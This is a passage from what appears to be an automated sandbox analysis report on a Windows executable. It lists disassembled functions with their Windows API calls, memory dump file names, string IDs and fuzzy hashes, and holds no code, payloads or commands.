              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Time$File$System$Local$SpecificVersion
              • String ID:
              • API String ID: 2092733347-0
              • Opcode ID: ce083377bf732ba5648678bfd8f0e44d5f2c54aa0d910980f07678669a1bb387
              • Instruction ID: 1e35b2ffaf5462b11309132ff824e7c9e73ff2618efe58918a850e1ce9e163ed
              • Opcode Fuzzy Hash: ce083377bf732ba5648678bfd8f0e44d5f2c54aa0d910980f07678669a1bb387
              • Instruction Fuzzy Hash: 6531C57A91020AEBCB00DFE9D8859EFBBBCFF58700B04455AE955E3610E730AA45CB75
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _memcmp
              • String ID:
              • API String ID: 2931989736-0
              • Opcode ID: 6bb31d1b6c09660bb1f1c0045c1b54b0de4f40b38a2515dc87554642d3a5ab38
              • Instruction ID: 8561111c2f1342e95f477d61930c7e891e169dce5eef4d0adde60a138f1327a6
              • Opcode Fuzzy Hash: 6bb31d1b6c09660bb1f1c0045c1b54b0de4f40b38a2515dc87554642d3a5ab38
              • Instruction Fuzzy Hash: DA21B07160060EBBD704AF10DCA1E3BB7ADEB55B94B248128FC099B205F270ED4587B4
              APIs
              • GetLastError.KERNEL32(?,00D90EE8,00D73E14,00D90EE8,?,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D78FA9
              • _free.LIBCMT ref: 00D78FDC
              • _free.LIBCMT ref: 00D79004
              • SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D79011
              • SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D7901D
              • _abort.LIBCMT ref: 00D79023
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 49ec5f5c98645bd200de7c5dff594454697976dcc7f4e5738e3750835dfea0db
              • Instruction ID: 34b7ae4acafbbefb6b6a5cc3b27204f553811e1d8e4848fab62210b6f09e425b
              • Opcode Fuzzy Hash: 49ec5f5c98645bd200de7c5dff594454697976dcc7f4e5738e3750835dfea0db
              • Instruction Fuzzy Hash: AFF022365D4B006AC22237386C1EB2F6A2ADFC0B70B38C118F51DE2292FF20C9027235
              APIs
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D6D2F2
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6D30C
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6D31D
              • TranslateMessage.USER32(?), ref: 00D6D327
              • DispatchMessageW.USER32(?), ref: 00D6D331
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D6D33C
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
              • String ID:
              • API String ID: 2148572870-0
              • Opcode ID: 3d22737f400e14bc32f1accb62b5eb416e17e038e189686a3dfbd1087c428238
              • Instruction ID: 3f63ccd627ec9feec2385acb4b7a61ea125d01aea4a03fc9ab7862a547e7da84
              • Opcode Fuzzy Hash: 3d22737f400e14bc32f1accb62b5eb416e17e038e189686a3dfbd1087c428238
              • Instruction Fuzzy Hash: 70F03C72E01219EBCB206BA1EC4CEEBBF6EEF527A1F048112FA06D2210D6348541C7B1
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\N0tepkRPzw.exe,00000104), ref: 00D776FD
              • _free.LIBCMT ref: 00D777C8
              • _free.LIBCMT ref: 00D777D2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\N0tepkRPzw.exe$`%~
              • API String ID: 2506810119-4027013704
              • Opcode ID: 6f760de4f0c69dee2cc5968f9f1aa2707b36e6c9d9ba6d59019c2989b0d0fff2
              • Instruction ID: f49a6015e42ae2164bc22fe9cd8f97c4fcefe83f120d47abd3bae79ceec5bd07
              • Opcode Fuzzy Hash: 6f760de4f0c69dee2cc5968f9f1aa2707b36e6c9d9ba6d59019c2989b0d0fff2
              • Instruction Fuzzy Hash: 69318F75A04318EFDB25DF99DC8599EBBECEB84710F2485A6E50897211E6708E40CBB0
              APIs
              • _wcschr.LIBVCRUNTIME ref: 00D6C435
                • Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CompareString_wcschr
              • String ID: <$HIDE$MAX$MIN
              • API String ID: 2548945186-3358265660
              • Opcode ID: 198548c50a75a286931f080f29170697cfd7ef3836fe5b58adc448af4b208ee3
              • Instruction ID: 092beee785d18941db9cecdeee965a8c759c63325dff98f0f4bc2f00d34dd217
              • Opcode Fuzzy Hash: 198548c50a75a286931f080f29170697cfd7ef3836fe5b58adc448af4b208ee3
              • Instruction Fuzzy Hash: 19318376910209ABDB21DA94CC45FFA77BCEB14310F044066F985D6051EBB1AEC4CA70
              APIs
              • LoadBitmapW.USER32(00000065), ref: 00D6ADFD
              • GetObjectW.GDI32(00000000,00000018,?), ref: 00D6AE22
              • DeleteObject.GDI32(00000000), ref: 00D6AE54
              • DeleteObject.GDI32(00000000), ref: 00D6AE77
                • Part of subcall function 00D69E1C: FindResourceW.KERNEL32(00D6AE4D,PNG,?,?,?,00D6AE4D,00000066), ref: 00D69E2E
                • Part of subcall function 00D69E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E46
                • Part of subcall function 00D69E1C: LoadResource.KERNEL32(00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E59
                • Part of subcall function 00D69E1C: LockResource.KERNEL32(00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E64
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
              • String ID: ]
              • API String ID: 142272564-3352871620
              • Opcode ID: ce9cfbfd87fcfec1ee67b049fd26dc74a09d2d85aa5ccdf5cd96d2c03913b5e5
              • Instruction ID: fb360553552f34e56e9317e27a2b858095441f1a44e095f70a99d2c84f2fc336
              • Opcode Fuzzy Hash: ce9cfbfd87fcfec1ee67b049fd26dc74a09d2d85aa5ccdf5cd96d2c03913b5e5
              • Instruction Fuzzy Hash: DB01C032641215E7CB1177689C15A7FBB7EEF81B52F080225BD90F7292DE738C158AB2
              APIs
                • Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
                • Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365
              • EndDialog.USER32(?,00000001), ref: 00D6CCDB
              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D6CCF1
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D6CD05
              • SetDlgItemTextW.USER32(?,00000068), ref: 00D6CD14
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: RENAMEDLG
              • API String ID: 445417207-3299779563
              • Opcode ID: 07ee2ee1b79c153dd1fbaf01dd8cad023d1da008a8a483f31136d8011413f927
              • Instruction ID: 34d64aa6299358bf59a5893d82ecc9f3c7a1719146333d6c2682e6e88db18eda
              • Opcode Fuzzy Hash: 07ee2ee1b79c153dd1fbaf01dd8cad023d1da008a8a483f31136d8011413f927
              • Instruction Fuzzy Hash: 18012433294310BBD6215F699C08F773B6DEB5AB42F150911F3C6E21E0C6A1A908CB75
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D77573,00000000,?,00D77513,00000000,00D8BAD8,0000000C,00D7766A,00000000,00000002), ref: 00D775E2
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D775F5
              • FreeLibrary.KERNEL32(00000000,?,?,?,00D77573,00000000,?,00D77513,00000000,00D8BAD8,0000000C,00D7766A,00000000,00000002), ref: 00D77618
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: 0e4c40bbac0ac134848d5abadf4257de4766fc5f65646034af2c65faaace954b
              • Instruction ID: cb5948d69dbcf568aa4306451efc6551f8212cafd50e4aa6669983c424d41567
              • Opcode Fuzzy Hash: 0e4c40bbac0ac134848d5abadf4257de4766fc5f65646034af2c65faaace954b
              • Instruction Fuzzy Hash: CFF04F34A1861CBBDB15AF95DC09B9DBFB9EF04B11F044168F809E2260EB308A44CBB4
              APIs
                • Part of subcall function 00D60085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D600A0
                • Part of subcall function 00D60085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5EB86,Crypt32.dll,00000000,00D5EC0A,?,?,00D5EBEC,?,?,?), ref: 00D600C2
              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D5EB92
              • GetProcAddress.KERNEL32(00D981C0,CryptUnprotectMemory), ref: 00D5EBA2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: AddressProc$DirectoryLibraryLoadSystem
              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
              • API String ID: 2141747552-1753850145
              • Opcode ID: 3f8e15a3f3bb7719c4a199e3b585866c6188490d52aa309f1d8b3d08e53817b9
              • Instruction ID: 6d361b4efb6791cb92b652b497011a12ad62d52a6386458e3170cf02519f9366
              • Opcode Fuzzy Hash: 3f8e15a3f3bb7719c4a199e3b585866c6188490d52aa309f1d8b3d08e53817b9
              • Instruction Fuzzy Hash: F6E04F70410751AFCF20BF39DC08B42BFE45B14B02B04881DE8DAD3240D6B4D5488F70
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: 5e240c91473a093255c495ed43fda41c3364254b2e32275d393f811d20fedc1a
              • Instruction ID: c0e9f5bba0f566bf53acc7081101ee6c3851b8b585dc5fda02ca8948e2a9684e
              • Opcode Fuzzy Hash: 5e240c91473a093255c495ed43fda41c3364254b2e32275d393f811d20fedc1a
              • Instruction Fuzzy Hash: 1C41A136A003049BDB24DF78C881A5EB7A6EF85714B1589A9E519EB351FB31ED01CBA0
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 00D7B619
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D7B63C
                • Part of subcall function 00D78518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D7B662
              • _free.LIBCMT ref: 00D7B675
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7B684
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: d1251b9451375bc5842c0af420843f13fd474e516e65f4eb015ebf43051951a1
              • Instruction ID: b0fc784842e24558a0d20e982e8665ea986571103c46814a3e2b0f469e6a4dc2
              • Opcode Fuzzy Hash: d1251b9451375bc5842c0af420843f13fd474e516e65f4eb015ebf43051951a1
              • Instruction Fuzzy Hash: 09017572601715BB632116765C8CD7F696DDAC6FB1319811ABA0CC6210FF60CD0192B0
              APIs
              • GetLastError.KERNEL32(?,?,?,00D7895F,00D785FB,?,00D78FD3,00000001,00000364,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D7902E
              • _free.LIBCMT ref: 00D79063
              • _free.LIBCMT ref: 00D7908A
              • SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D79097
              • SetLastError.KERNEL32(00000000,?,00D90EE8,00000200), ref: 00D790A0
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 417622412443549136b832f682cf17027a2505a28d6fa63cd48ae8cd5ebec514
              • Instruction ID: 6b2cc97d2a874547d6fd107231a42ecbae2c308cc7bbc3e36dfa33e76d9f3604
              • Opcode Fuzzy Hash: 417622412443549136b832f682cf17027a2505a28d6fa63cd48ae8cd5ebec514
              • Instruction Fuzzy Hash: B901F477565B006EC32227356CAA92B671EDBC17B13288024F50DD2292FF60CC015274
              APIs
                • Part of subcall function 00D60A41: ResetEvent.KERNEL32(?), ref: 00D60A53
                • Part of subcall function 00D60A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D60A67
              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D6078F
              • CloseHandle.KERNEL32(?,?), ref: 00D607A9
              • DeleteCriticalSection.KERNEL32(?), ref: 00D607C2
              • CloseHandle.KERNEL32(?), ref: 00D607CE
              • CloseHandle.KERNEL32(?), ref: 00D607DA
                • Part of subcall function 00D6084E: WaitForSingleObject.KERNEL32(?,000000FF,00D60A78,?), ref: 00D60854
                • Part of subcall function 00D6084E: GetLastError.KERNEL32(?), ref: 00D60860
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd
              Similarity
              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
              • String ID:
              • API String ID: 1868215902-0
              • Opcode ID: b7865ca7c27fe8b8eb8d1a16896f18cf7ab3c61758d5cc14bfdb8969b002fc45
              • Instruction ID: 9f04555f2ea9482cb455301e4e450d45d64f4a46d3ea117204980ced7644181e
              • Opcode Fuzzy Hash: b7865ca7c27fe8b8eb8d1a16896f18cf7ab3c61758d5cc14bfdb8969b002fc45
              • Instruction Fuzzy Hash: 96015E72550704EFC7229F69DD84F8ABBE9FB49B50F000529F15E82264CB756A48DBB0
              APIs
              • _free.LIBCMT ref: 00D7BF28
                • Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
                • Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506
              • _free.LIBCMT ref: 00D7BF3A
              • _free.LIBCMT ref: 00D7BF4C
              • _free.LIBCMT ref: 00D7BF5E
              • _free.LIBCMT ref: 00D7BF70
              Memory Dump Source
              • Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
              • Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
